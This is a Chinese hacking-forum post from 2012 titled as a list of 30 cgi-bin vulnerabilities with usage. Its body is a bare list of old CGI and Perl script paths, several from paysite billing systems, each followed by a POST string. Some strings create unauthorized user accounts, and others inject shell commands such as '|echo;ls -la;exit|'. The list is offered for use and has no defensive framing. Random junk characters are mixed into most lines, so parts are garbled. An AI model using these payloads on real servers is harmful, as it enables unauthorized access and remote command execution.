找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2715|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================6 _% a# q1 C, b& F* a

+ I( `4 r9 y% |: e0 {$ M. n5 {' B3 F/smspass.pl# @, x; _5 c6 c* ^
username=username&password=password
8 G% {7 a) ^/ j" O* Y" V: L: o) }: Z" x5 N, X8 F$ [/ J
/index.cgi
$ {! u0 I) W3 C& Z! M) D) D# U) Swei=ren&gen=command- f/ w5 o5 N% [7 g9 A" h

9 W. q3 }9 B, p9 @: \& P$ J/passmaster.cgi. S- A  m! C9 Y% \
Action=Add&Username=Username&Password=Password+ t% j8 M3 n* y. w& Q3 W$ f" _

# `- n1 ?: P9 z3 D) M" w/accountcreate.cgi4 z! z+ G% S/ e5 Y+ t
username=username&password=password&ref1=|echo;ls|  T  w1 E" y+ R3 O( D2 h; B" A
* ~8 Y% c* t5 K, `6 O* R; j
/form.cgi
9 F& M2 M9 v/ G; L4 sname=xxxx&email=email&subject=xxxx&response=|echo;ls|
; J  S: e- _9 \8 p- i! P0 m8 S+ y) s+ t: W$ R* i
/addusr.pl0 A8 p5 W- |) m; [* Y
/cgi-bin/EuroDebit/addusr.pl" L" B5 a5 W0 A
user=username&pass=Password&confirm=Password5 g  j0 o" d6 J* I% T& U9 k) V; _
( h& {1 B; K8 M0 M+ y
/ccbill-local.asp
( T6 H7 i) T4 dpost_values=username:password
6 R& k) G  ?, E4 E. r9 N& H
6 X8 W, T. \  ~' E0 p/count.cgi3 m) V3 `/ }. B  }$ X$ f
pinfile=|echo;ls -la;exit|
0 \# n% Y' f9 y: t' P2 \/ I3 n' X2 i$ T% ]$ Y$ W4 W3 f) k" ^; Z$ F
/recon.cgi4 {) v' }6 \! J1 o, u; L
/recon.cgi?search6 j! }* d! a7 d/ h' Z
searchoption=1&searchfor=|echo;ls -al;exit|
/ E( }( G0 A* F9 H1 V' Q
5 r" E; A$ z# B. ~9 P/verotelrum.pl
# o! X1 p( u! e* n+ t: \1 x' Nvercode=username:password:dseegsow:add:amount<&30>% x7 Z- h$ i2 r5 i( b& b& A" V
2 ~# O. m6 G: t8 u* Q' n; r* P
/af.cgi
) T1 L2 T2 D& U1 N- w% s_browser_out=|echo;ls -la;exit;|& U; U' {9 x: D! H

/ I, O; P/ p1 x+ |9 \- A  r/modify.cgi2 A# B; p; y7 l6 t
username=username&password=password&expire=30: }- }; G- d  w5 u
9 |, t+ g8 ~; \* u- ?8 L
/openjournal.cgi
+ z- ^# J4 b5 N3 Yedit=1&ct=2&go=|echo;ls -al;exit|
+ w/ H. j) I: ~1 T" y- s$ u% Q7 Q  @2 W7 B
/gx9passwd.cgi
. |2 Y- a$ h) a% Jcmd=ADD&user=username&pass=password
2 r5 R( F2 C% I* s( j2 C6 c
4 ^& I6 l7 k* |- F8 H1 u- A/probecontrol.cgi
$ G' E# K3 {& b. @/ ~: e; }: X* z0 lcommand=enable&username=username&password=password' c( X% P( @( l7 s
9 e3 J+ X+ c' j- Z
/recon.cgi6 e/ V" i1 v5 M: O8 W5 M
searchoption=3&searchfor=echo;ls -la;exit
! Y# b0 _8 z5 [5 S! P5 s' i+ y3 T- s) M
/htadd.pl
+ d6 f0 m  Y$ A$ yconfigfile=|echo; ls -alt; exit5 S4 j5 @/ u7 }, i7 N; f# ~1 B4 f
! }3 F! @6 i/ P$ h
/gx9passwd.cgi
/ V/ g9 b1 h+ acmd=ADD&user=username&pass=password* M- Z3 B4 g, K( G2 N, ~1 [- \0 V

1 r- r6 J6 M# q9 W) E3 Y3 L/ibill*.pl9 |4 T6 a: _" e) |6 B; U, P
reqtype=add&authpwd=authpwd&username=username&password=password
0 D! A, Z1 t) v8 R# Y' @( d  ?$ U4 }! j  G: @
/cpay.cgi
  M. K, y( O; p* S1 I6 w" S2 Rcommand=add_member&username=username(EMAIL)&password=password(DES)* j& p2 }# g$ r$ M* J' t

3 y4 m" b+ \- L5 E/globill_ut.cgi
4 Z+ ^% `, ]) i0 H& G+ ndo=add&username=username&password=password&wpassword=password
- f0 E) Z7 ], H' h% r/ e0 t9 Y4 r' Y7 \9 v& _* l& t0 \+ u
/usercontrol.cgi. e7 V2 J4 b, J/ G' F/ \- ?
command=enable&username=USER&password=PASS
) @  B6 F1 B6 n0 n5 n# n4 k0 @6 A0 Z8 _  ?/ F+ Z0 x
/globoSALErum.cgi! p- d& ~3 U* G3 I# V
action=ADD&seccode=seccode&login=username&password=password# K* j7 O' m8 P( ]  C7 b
/ M- `# O* }5 N6 o
/addusr.pl  i) Q$ A6 e9 E
user=USER&pass=PASS&confirm=PASS
0 M2 J" i0 Q9 V: A- j' E- N0 V) O+ _) z
/pincount.cgi
+ ~7 }+ N( m% L: L/cgi-bin/mastergate/pincount.cgi
& r/ w- G2 c0 ~pinfile=|echo;pwd;exit|
- q1 {& w( l# v7 a1 V3 J8 R
. {( J8 N9 M9 v" S! L- A/accountcreate.cgi/ c  t. [& m+ Z3 s' V5 K* M6 y+ i# I8 Z
/cgi-bin/gateway/accountcreate.cgi
  S4 j1 Y* s% j5 m: fusername=username&password=password&password2=password&ref1=|echo;ls -al;exit* G3 M& F5 M/ [' t1 n
" S! j  X% j- j. u% K3 Q
/af.cgi
7 t) x+ x6 \  W$ y: h. k/env.cgi1 C' h2 n: z+ I, m$ W
ADD+;echo;pwd;exit
( A1 R3 A$ T9 L" b& w: q+ Q5 L: g8 q% V) |% @8 I, v
/count.cgi* T. l' R# T/ h7 o/ _- v1 a) H0 }& r0 z
pinfile=|echo;pwd;exit|: ^5 Q! n6 p  o4 G+ O

9 @3 S4 h! I$ u9 T/ o' B, h/recon.cgi3 p% m4 v3 N8 V3 @# a
searchoption=1&searchfor=|echo;ls%20-al;exit|8 G1 [5 g  _- G1 `: m
8 M6 w) ?6 d+ H$ q/ B
/add.cgi& D" P( n2 V( x' i% n0 D
username=username&password=password&expire=307 K1 t  G. W" @5 Y
5 K  Z, K. @" }" O6 [0 p6 ^
==============================
+ G0 g5 `0 F1 m- @" q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表